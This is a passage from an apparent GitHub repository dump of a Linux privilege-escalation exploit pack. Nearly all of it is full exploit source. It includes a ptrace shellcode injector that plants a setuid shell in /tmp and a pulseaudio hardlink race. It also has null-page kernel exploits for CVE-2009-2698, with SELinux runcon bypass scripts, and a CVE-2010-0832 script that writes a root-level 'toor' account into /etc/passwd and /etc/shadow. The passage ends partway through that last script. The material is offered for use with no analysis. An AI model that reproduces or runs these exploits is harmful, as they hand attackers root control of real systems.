exploit by s0m3b0dy 3 | 4 | [*] tested on Gentoo 2.6.29rc1 5 | 6 | grataz: 7 | Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... 8 | 9 | email: s0m3b0dy1 (at) gmail.com 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | char shellcode[] = 28 | "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" 29 | "\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" 30 | "\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" 31 | "echo \"#include \nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;"; 32 | struct user_regs_struct322 { 33 | unsigned long ebx, ecx, edx, esi, edi, ebp, eax; 34 | unsigned short ds, __ds, es, __es; 35 | unsigned short fs, __fs, gs, __gs; 36 | unsigned long orig_eax, eip; 37 | unsigned short cs, __cs; 38 | unsigned long eflags, esp; 39 | unsigned short ss, __ss; 40 | }; 41 | 42 | main() 43 | { 44 | struct user_regs_struct322 regs; 45 | struct stat buf; 46 | int i,o; 47 | unsigned long * src; 48 | unsigned long * dst; 49 | char *env[2]; 50 | env[0]="/usr/bin/gpasswd"; // some suid file 51 | env[1]=0; 52 | if((o=fork()) == 0) 53 | { 54 | execve(env[0],env,0); 55 | exit(0); 56 | } 57 | if(ptrace(PTRACE_ATTACH,o,0,0)==-1) 58 | { 59 | printf("\n[-] Attach\n"); 60 | exit(0); 61 | } 62 | wait((int *)0); 63 | if (ptrace(PTRACE_GETREGS, o, NULL, ®s) == -1){ 64 | printf("\n[-] read registers\n"); 65 | exit(0); 66 | } 67 | printf( "[+] EIP - 0x%08lx\n", regs.eip); 68 | dst= (unsigned long *) regs.eip; 69 | src = (unsigned long *) shellcode; 70 | for(i=0;i 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "config.h" 9 | 10 | int main (int argc, char **argv) { 11 | 12 | int x=0,status,w,pid,y=0; 13 | char linkfn[1024],linkfndeleted[1024],fnshell[1024]; 14 | struct stat ft; 15 | 16 | snprintf(linkfn,sizeof(linkfn),"%s/p",PATH); 17 | snprintf(linkfndeleted,sizeof(linkfndeleted),"%s/p (deleted)",PATH); 18 | snprintf(fnshell,sizeof(fnshell),"%s/shell",PATH); 19 | 20 | if (stat(PATHSHELL,&ft)==0) { 21 | 22 | if (ft.st_uid == 0) { 23 | printf("Try: %s /bin/sh\n",PATHSHELL); 24 | return 0; 25 | } 26 | 27 | } 28 | 29 | if (stat(VULNBIN,&ft)!=0) { 30 | printf("%s not found.\n",VULNBIN); 31 | return 0; 32 | } 33 | 34 | if (!(ft.st_mode & S_ISUID)) { 35 | printf("%s is not suid.\n",VULNBIN); 36 | return 0; 37 | } 38 | if (stat(fnshell,&ft)!=0) { 39 | printf("%s not found.\n",fnshell); 40 | return 0; 41 | } 42 | printf("Please wait.\n"); 43 | for (y=0; y < 5000; y++) { 44 | 45 | unlink(linkfn); 46 | unlink(linkfndeleted); 47 | 48 | if (link(VULNBIN,linkfn)!=0) { 49 | perror("link"); 50 | return -1; 51 | } 52 | 53 | if (link(fnshell,linkfndeleted)!=0) { 54 | perror("link"); 55 | return -1; 56 | } 57 | 58 | pid = fork(); 59 | 60 | if (pid == -1) { 61 | perror("fork"); 62 | return -1; 63 | } else if (pid == 0) { 64 | // exec 65 | { 66 | char *args[]={"p",NULL}; 67 | //char *envp[]={"LD_BIND_NOW=1",NULL}; 68 | char *envp[]={NULL}; 69 | close(2); 70 | execve(linkfn,args,envp); 71 | } 72 | return 0; 73 | 74 | } else { 75 | if (unlink(linkfn)!=0) { 76 | perror("unlink:::"); 77 | return -1; 78 | } 79 | 80 | if (link(fnshell,linkfn)!=0) { 81 | perror("link"); 82 | return 1; 83 | } 84 | for (;;) { 85 | 86 | w = waitpid(pid, &status,WNOHANG); 87 | 88 | if (w == 0) { 89 | if (x > 1) { 90 | kill(pid,9); 91 | x=0; 92 | } 93 | usleep(5000); 94 | x++; 95 | continue; 96 | } 97 | 98 | if (w == -1) { 99 | perror("waitpid"); 100 | break; 101 | } 102 | 103 | break; 104 | 105 | } 106 | 107 | if (stat(PATHSHELL,&ft)==0) { 108 | 109 | if ((ft.st_uid == 0) && (ft.st_mode & S_ISUID)) { 110 | printf("Try: %s /bin/sh\n",PATHSHELL); 111 | unlink(linkfn); 112 | unlink(linkfndeleted); 113 | return 0; 114 | } 115 | } 116 | 117 | } 118 | 119 | } 120 | 121 | printf("finished 5000 attempts without success. maybe not vulnerable?\n"); 122 | 123 | unlink(linkfn); 124 | unlink(linkfndeleted); 125 | 126 | return 0; 127 | } 128 | -------------------------------------------------------------------------------- /2009/CVE-2009-1894/pulseaudio-exp/shell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "config.h" 7 | 8 | int main (int argc, char **argv) { 9 | 10 | char fnshell[1024]; 11 | 12 | if (geteuid() ==0) { 13 | 14 | if (setuid(0)!=0) { 15 | printf("setuid failed\n"); 16 | return 0; 17 | } 18 | if (setgid(0)!=0) { 19 | printf("setgid failed\n"); 20 | return 0; 21 | } 22 | 23 | if (argc > 1) { 24 | system(argv[1]); 25 | return 0; 26 | } 27 | 28 | if (access(PATHSHELL,R_OK|X_OK)!=0) { 29 | 30 | snprintf(fnshell,sizeof(fnshell),"%s/shell",PATH); 31 | 32 | printf("[*] Seems we are uid = %d and gid = %d\n",getuid(),getgid()); 33 | printf("[*] mv %s %s\n",fnshell,PATHSHELL); 34 | if (rename(fnshell, PATHSHELL)!=0) 35 | perror("rename"); 36 | printf("[*] chown root.root %s\n",PATHSHELL); 37 | if (chown(PATHSHELL,0,0)!=0) 38 | perror("chown"); 39 | printf("[*] chmod 4755 %s\n",PATHSHELL); 40 | if (chmod(PATHSHELL,04755)!=0) 41 | perror("chmod"); 42 | } 43 | 44 | } 45 | 46 | return 0; 47 | } 48 | -------------------------------------------------------------------------------- /2009/CVE-2009-2698/CVE-2009-2698.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** 3 | ** 0x82-CVE-2009-2698 4 | ** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit 5 | ** 6 | ** Tested White Box 4(2.6.9-5.ELsmp), 7 | ** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp), 8 | ** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5), 9 | ** Fedora Core 6(2.6.18-1.2798.fc6). 10 | ** 11 | ** -- 12 | ** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team. 13 | ** Thankful to them. 14 | ** 15 | ** -- 16 | ** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698 17 | ** sh-3.1# id 18 | ** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t 19 | ** sh-3.1# 20 | ** -- 21 | ** exploit by . 22 | ** 23 | */ 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | unsigned int uid, gid; 34 | void get_root_uid(unsigned *task) 35 | { 36 | unsigned *addr=task; 37 | while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){ 38 | addr++; 39 | } 40 | addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */ 41 | addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */ 42 | return; 43 | } 44 | void exploit(); 45 | void kernel_code() 46 | { 47 | asm("exploit:\n" 48 | "push %eax\n" 49 | "movl $0xfffff000,%eax\n" 50 | "andl %esp,%eax\n" 51 | "pushl (%eax)\n" 52 | "call get_root_uid\n" 53 | "addl $4,%esp\n" 54 | "popl %eax\n"); 55 | return; 56 | } 57 | void *kernel=kernel_code; 58 | 59 | int main(int argc, char **argv) 60 | { 61 | int fd=0; 62 | char buf[1024]; 63 | struct sockaddr x0x; 64 | void *zero_page; 65 | 66 | uid=getuid(); 67 | gid=getgid(); 68 | if(uid==0){ 69 | fprintf(stderr,"[-] check ur uid\n"); 70 | return -1; 71 | } 72 | if(personality(0xffffffff)==PER_SVR4){ 73 | if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){ 74 | perror("[-] mprotect()"); 75 | return -1; 76 | } 77 | } 78 | else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){ 79 | perror("[-] mmap()"); 80 | return -1; 81 | } 82 | *(unsigned long *)0x0=0x90909090; 83 | *(char *)0x00000004=0x90; /* +1 */ 84 | *(char *)0x00000005=0xff; 85 | *(char *)0x00000006=0x25; 86 | *(unsigned long *)0x00000007=(unsigned long)&kernel; 87 | *(char *)0x0000000b=0xc3; 88 | 89 | if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){ 90 | perror("[-] socket()"); 91 | return -1; 92 | } 93 | x0x.sa_family=AF_UNSPEC; 94 | memset(x0x.sa_data,0x82,14); 95 | memset((char *)buf,0,sizeof(buf)); 96 | sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x)); 97 | sendto(fd,buf,1024,0,&x0x,sizeof(x0x)); 98 | if(getuid()==uid){ 99 | printf("[-] exploit failed, try again\n"); 100 | return -1; 101 | } 102 | close(fd); 103 | execl("/bin/sh","sh","-i",NULL); 104 | return 0; 105 | } 106 | 107 | /* eoc */ 108 | 109 | // milw0rm.com [2009-08-31] 110 | -------------------------------------------------------------------------------- /2009/CVE-2009-2698/therebel/pwnkernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PULSEAUDIO_PATH "/usr/bin/pulseaudio" 8 | #define PATH_TO_EXPLOIT "/home/spender/therebel/therebel/exploit.so" 9 | 10 | int main(void) 11 | { 12 | int ret; 13 | struct stat fstat; 14 | 15 | ret = personality(PER_SVR4); 16 | 17 | if (ret == -1) { 18 | fprintf(stderr, "Unable to set personality!\n"); 19 | return 0; 20 | } 21 | 22 | fprintf(stdout, " [+] Personality set to: PER_SVR4\n"); 23 | 24 | if (stat(PULSEAUDIO_PATH, &fstat)) { 25 | fprintf(stderr, "Pulseaudio does not exist!\n"); 26 | return 0; 27 | } 28 | 29 | if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) { 30 | fprintf(stderr, "Pulseaudio is not suid root!\n"); 31 | return 0; 32 | } 33 | 34 | execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL); 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /2009/CVE-2009-2698/therebel/therebel.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'` 4 | sed "s/\/home\/spender/$ESCAPED_PWD/g" pwnkernel.c > pwnkernel1.c 5 | mv pwnkernel.c pwnkernel2.c 6 | mv pwnkernel1.c pwnkernel.c 7 | killall -9 pulseaudio 2> /dev/null 8 | IS_64=`uname -m` 9 | OPT_FLAG="" 10 | if [ "$IS_64" = "x86_64" ]; then 11 | OPT_FLAG="-m64" 12 | fi 13 | MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null` 14 | if [ "$MINADDR" = "" -o "$MINADDR" = "0" ]; then 15 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 2> /dev/null 16 | if [ "$?" = "1" ]; then 17 | cc $OPT_FLAG -o exploit exploit.c 2> /dev/null 18 | fi 19 | ./exploit 20 | elif [ ! -f '/selinux/enforce' ]; then 21 | cc -fno-stack-protector -fPIC $OPT_FLAG -shared -o exploit.so exploit.c 2> /dev/null 22 | if [ "$?" = "1" ]; then 23 | cc -fPIC $OPT_FLAG -shared -o exploit exploit.c 2> /dev/null 24 | fi 25 | cc $OPT_FLAG -o pwnkernel pwnkernel.c 26 | ./pwnkernel 27 | else 28 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 2> /dev/null 29 | if [ "$?" = "1" ]; then 30 | cc $OPT_FLAG -o exploit exploit.c 2> /dev/null 31 | fi 32 | ./exploit 33 | if [ "$?" = "1" ]; then 34 | runcon -t initrc_t ./exploit 35 | if [ "$?" = "1" ]; then 36 | runcon -t wine_t ./exploit 37 | if [ "$?" = "1" ]; then 38 | runcon -t vbetool_t ./exploit 39 | if [ "$?" = "1" ]; then 40 | runcon -t unconfined_mono_t ./exploit 41 | if [ "$?" = "1" ]; then 42 | runcon -t samba_unconfined_net_t ./exploit 43 | fi 44 | fi 45 | fi 46 | fi 47 | fi 48 | fi 49 | mv -f pwnkernel2.c pwnkernel.c 50 | -------------------------------------------------------------------------------- /2009/iskorpitx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/iskorpitx -------------------------------------------------------------------------------- /2009/linux-sendpage3/exploit-pulseaudio.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int 7 | main(int argc, char **argv) 8 | { 9 | if (argc < 2) 10 | exit(EXIT_FAILURE); 11 | 12 | if (personality(PER_SVR4) == -1) { 13 | perror("personality"); 14 | exit(EXIT_FAILURE); 15 | } 16 | 17 | execl("/usr/bin/pulseaudio", "pulseaudio", 18 | "--log-level=0", "-L", argv[1], NULL); 19 | 20 | exit(EXIT_SUCCESS); 21 | } 22 | -------------------------------------------------------------------------------- /2009/linux-sendpage3/run: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | EXPLOIT=./exploit 4 | EXPLOIT_PULSEAUDIO=./exploit-pulseaudio 5 | GCC=/usr/bin/gcc 6 | 7 | if [ -x $GCC ]; then 8 | if [ -x $EXPLOIT ]; then 9 | rm -f $EXPLOIT 10 | fi 11 | 12 | if [ -x $EXPLOIT_PULSEAUDIO ]; then 13 | rm -f $EXPLOIT_PULSEAUDIO 14 | fi 15 | 16 | if [ -x $EXPLOIT.so ]; then 17 | rm -f $EXPLOIT.so 18 | fi 19 | 20 | MACHINE=$(uname -m) 21 | 22 | if [ "$MACHINE" = "x86_64" -o "$MACHINE" = "ppc64" ]; then 23 | $GCC -Wall -m64 -o $EXPLOIT $EXPLOIT.c 24 | $GCC -Wall -m64 -o $EXPLOIT_PULSEAUDIO $EXPLOIT_PULSEAUDIO.c 25 | $GCC -Wall -fPIC -m64 -shared -o $EXPLOIT.so $EXPLOIT.c 26 | else 27 | $GCC -Wall -o $EXPLOIT $EXPLOIT.c 28 | $GCC -Wall -o $EXPLOIT_PULSEAUDIO $EXPLOIT_PULSEAUDIO.c 29 | $GCC -Wall -fPIC -shared -o $EXPLOIT.so $EXPLOIT.c 30 | fi 31 | 32 | if [ -x $EXPLOIT ]; then 33 | $EXPLOIT 34 | 35 | if [ $? -eq 0 ]; then 36 | exit 37 | fi 38 | 39 | source ./runcon-mmap_zero 40 | fi 41 | 42 | if [ -x $EXPLOIT_PULSEAUDIO ]; then 43 | if [ -e $EXPLOIT.so ]; then 44 | PULSEAUDIO=/usr/bin/pulseaudio 45 | 46 | if [ -x $PULSEAUDIO ]; then 47 | $PULSEAUDIO -k &> /dev/null 48 | $PULSEAUDIO --check &> /dev/null 49 | 50 | if [ $? -eq 0 ]; then 51 | kill -9 $(pidof pulseaudio) 52 | fi 53 | 54 | $EXPLOIT_PULSEAUDIO $PWD/$EXPLOIT 55 | fi 56 | fi 57 | fi 58 | fi 59 | -------------------------------------------------------------------------------- /2009/linux-sendpage3/runcon-mmap_zero: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | EXPLOIT=./exploit 4 | RUNCON=/usr/bin/runcon 5 | 6 | if [ -x $EXPLOIT ]; then 7 | if [ -x $RUNCON ]; then 8 | SELINUX_ENFORCE=/selinux/enforce 9 | 10 | if [ -f $SELINUX_ENFORCE ]; then 11 | ENFORCE=$(cat $SELINUX_ENFORCE) 12 | fi 13 | 14 | GETENFORCE=/usr/sbin/getenforce 15 | 16 | if [ -x $GETENFORCE ]; then 17 | ENFORCE=$($GETENFORCE) 18 | fi 19 | 20 | if [ "$ENFORCE" = "1" -o "$ENFORCE" = "Enforcing" ]; then 21 | source ./sesearch-mmap_zero 22 | 23 | for TYPE in $(cat unconfined_t_trans_mmap_zero.txt); do 24 | $RUNCON -t $TYPE -- $EXPLOIT 25 | 26 | if [ $? -eq 0 ]; then 27 | exit 28 | fi 29 | done 30 | 31 | for TYPE in $(cat initrc_t_trans_mmap_zero.txt); do 32 | $RUNCON -t initrc_t -- $RUNCON -t $TYPE -- $EXPLOIT 33 | 34 | if [ $? -eq 0 ]; then 35 | exit 36 | fi 37 | done 38 | 39 | $RUNCON -t initrc_t -r system_r -- $EXPLOIT 40 | 41 | CHCON=/usr/bin/chcon 42 | 43 | if [ -x $CHCON ]; then 44 | $CHCON -t initrc_exec_t $EXPLOIT 45 | 46 | for TYPE in $(cat initrc_t_trans_mmap_zero.txt); do 47 | $RUNCON -t initrc_t -r system_r \ 48 | -- $RUNCON -t $TYPE -- $EXPLOIT 49 | 50 | if [ $? -eq 0 ]; then 51 | exit 52 | fi 53 | done 54 | fi 55 | fi 56 | fi 57 | fi 58 | -------------------------------------------------------------------------------- /2009/linux-sendpage3/sesearch-mmap_zero: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | SESEARCH=/usr/bin/sesearch 4 | AWK=/usr/bin/awk 5 | UNIQ=/usr/bin/uniq 6 | 7 | if [ -x $SESEARCH ]; then 8 | $SESEARCH -p mmap_zero --allow \ 9 | | $AWK '{ printf "%s\n", $2 }' | grep '_t' | sort | $UNIQ \ 10 | > mmap_zero.txt 11 | 12 | $SESEARCH -s unconfined_t -c process -p transition --allow \ 13 | | $AWK '{ printf "%s\n", $3 }' | grep '_t' | sort | $UNIQ \ 14 | > unconfined_t_trans.txt 15 | 16 | $SESEARCH -s initrc_t -c process -p transition --allow \ 17 | | $AWK '{ printf "%s\n", $3 }' | grep '_t' | sort | $UNIQ \ 18 | > initrc_t_trans.txt 19 | 20 | if [ -f unconfined_t_trans_mmap_zero.txt ]; then 21 | rm -f unconfined_t_trans_mmap_zero.txt 22 | fi 23 | 24 | touch unconfined_t_trans_mmap_zero.txt 25 | 26 | for TYPE in $(cat mmap_zero.txt); do 27 | grep $TYPE unconfined_t_trans.txt >> unconfined_t_trans_mmap_zero.txt 28 | done 29 | 30 | if [ -f initrc_t_trans_mmap_zero.txt ]; then 31 | rm -f initrc_t_trans_mmap_zero.txt 32 | fi 33 | 34 | touch initrc_t_trans_mmap_zero.txt 35 | 36 | for TYPE in $(cat mmap_zero.txt); do 37 | grep $TYPE initrc_t_trans.txt >> initrc_t_trans_mmap_zero.txt 38 | done 39 | fi 40 | -------------------------------------------------------------------------------- /2009/r00t: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/r00t -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/exploit.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/wunderbar_emporium2/exploit.so -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/pwnkernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/wunderbar_emporium2/pwnkernel -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/pwnkernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PULSEAUDIO_PATH "/usr/bin/pulseaudio" 8 | #define PATH_TO_EXPLOIT "/home/spender/exploit.so" 9 | 10 | int main(void) 11 | { 12 | int ret; 13 | struct stat fstat; 14 | 15 | ret = personality(PER_SVR4); 16 | 17 | if (ret == -1) { 18 | fprintf(stderr, "Unable to set personality!\n"); 19 | return 0; 20 | } 21 | 22 | fprintf(stdout, " [+] Personality set to: PER_SVR4\n"); 23 | 24 | if (stat(PULSEAUDIO_PATH, &fstat)) { 25 | fprintf(stderr, "Pulseaudio does not exist!\n"); 26 | return 0; 27 | } 28 | 29 | if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) { 30 | fprintf(stderr, "Pulseaudio is not suid root!\n"); 31 | return 0; 32 | } 33 | 34 | execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL); 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/wunderbar_emporium.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'` 4 | sed "s/\/home\/spender/$ESCAPED_PWD/g" pwnkernel.c > pwnkernel1.c 5 | mv pwnkernel.c pwnkernel2.c 6 | mv pwnkernel1.c pwnkernel.c 7 | killall -9 pulseaudio 2> /dev/null 8 | IS_64=`uname -p` 9 | OPT_FLAG="" 10 | if [ "$IS_64" = "x86_64" ]; then 11 | OPT_FLAG="-m64" 12 | fi 13 | MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null` 14 | if [ "$MINADDR" = "" -o "$MINADDR" = "0" ]; then 15 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 2> /dev/null 16 | if [ "$?" = "1" ]; then 17 | cc $OPT_FLAG -o exploit exploit.c 18 | fi 19 | cat tzameti.avi >> ./exploit 20 | ./exploit 21 | elif [ ! -f '/selinux/enforce' ]; then 22 | cc -fno-stack-protector -fPIC $OPT_FLAG -shared -o exploit.so exploit.c 23 | cc $OPT_FLAG -o pwnkernel pwnkernel.c 24 | ./pwnkernel 25 | else 26 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 27 | cat tzameti.avi >> ./exploit 28 | ./exploit 29 | if [ "$?" = "1" ]; then 30 | runcon -t initrc_t ./exploit 31 | if [ "$?" = "1" ]; then 32 | runcon -t wine_t ./exploit 33 | if [ "$?" = "1" ]; then 34 | runcon -t vbetool_t ./exploit 35 | if [ "$?" = "1" ]; then 36 | runcon -t unconfined_mono_t ./exploit 37 | if [ "$?" = "1" ]; then 38 | runcon -t samba_unconfined_net_t ./exploit 39 | fi 40 | fi 41 | fi 42 | fi 43 | fi 44 | fi 45 | mv -f pwnkernel2.c pwnkernel.c 46 | -------------------------------------------------------------------------------- /2010/2.6.18 2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18 2010 -------------------------------------------------------------------------------- /2010/2.6.18-194 2010 x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18-194 2010 x86_64 -------------------------------------------------------------------------------- /2010/2.6.18/2.6.18-194.1-2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18/2.6.18-194.1-2010 -------------------------------------------------------------------------------- /2010/2.6.18/2.6.18-194.17.1.el5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18/2.6.18-194.17.1.el5 -------------------------------------------------------------------------------- /2010/2.6.32/2.6.32-2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.32/2.6.32-2010 -------------------------------------------------------------------------------- /2010/2.6.36-rc1 and down/compile2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.36-rc1 and down/compile2 -------------------------------------------------------------------------------- /2010/2.6.36-rc1 and down/i-CAN-haz-MODHARDEN: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.36-rc1 and down/i-CAN-haz-MODHARDEN -------------------------------------------------------------------------------- /2010/2.6.36.2 and down/2.6.36.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.36.2 and down/2.6.36.2 -------------------------------------------------------------------------------- /2010/2.6.37 and down/full-nelson: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.37 and down/full-nelson -------------------------------------------------------------------------------- /2010/2.6.xx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.xx -------------------------------------------------------------------------------- /2010/2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2010 -------------------------------------------------------------------------------- /2010/CVE-2010-0832.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Exploit Title: Ubuntu PAM MOTD local root 4 | # Date: July 9, 2010 5 | # Author: Anonymous 6 | # Software Link: http://packages.ubuntu.com/ 7 | # Version: pam-1.1.0 8 | # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) 9 | # CVE: CVE-2010-0832 10 | # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i 11 | # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen 12 | # 13 | # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. 14 | # Does not prompt for login by creating temporary SSH key and authorized_keys entry. 15 | # 16 | # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh 17 | # [*] Ubuntu PAM MOTD local root 18 | # [*] Backuped /home/user/.ssh/authorized_keys 19 | # [*] SSH key set up 20 | # [*] Backuped /home/user/.cache 21 | # [*] spawn ssh 22 | # [+] owned: /etc/passwd 23 | # [*] spawn ssh 24 | # [+] owned: /etc/shadow 25 | # [*] Restored /home/user/.cache 26 | # [*] Restored /home/user/.ssh/authorized_keys 27 | # [*] SSH key removed 28 | # [+] Success! Use password toor to get root 29 | # Password: 30 | # root@ubuntu:/home/user# id 31 | # uid=0(root) gid=0(root) groupes=0(root) 32 | # 33 | P='toor:x:0:0:root:/root:/bin/bash' 34 | S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' 35 | echo "[*] Ubuntu PAM MOTD local root" 36 | [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1 37 | [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1 38 | [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1 39 | backup() { 40 | [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak 41 | [ -e "$1" ] || return 0 42 | mv "$1"{,.bak} || return 1 43 | echo "[*] Backuped $1" 44 | } 45 | restore() { 46 | [ -e "$1" ] && rm -rf "$1" 47 | [ -e "$1".bak ] || return 0 48 | mv "$1"{.bak,} || return 1 49 | echo "[*] Restored $1" 50 | } 51 | key_create() { 52 | backup ~/.ssh/authorized_keys 53 | ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 54 | [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; } 55 | mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 56 | echo "[*] SSH key set up" 57 | } 58 | key_remove() { 59 | rm -f "$KEY" 60 | restore ~/.ssh/authorized_keys 61 | echo "[*] SSH key removed" 62 | } 63 | own() { 64 | [ -e ~/.cache ] && rm -rf ~/.cache 65 | ln -s "$1" ~/.cache || return 1 66 | echo "[*] spawn ssh" 67 | ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true 68 | [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } 69 | echo "[+] owned: $1" 70 | } 71 | bye() { 72 | key_remove 73 | exit 1 74 | } 75 | KEY="$(mktemp -u)" 76 | key_create || { 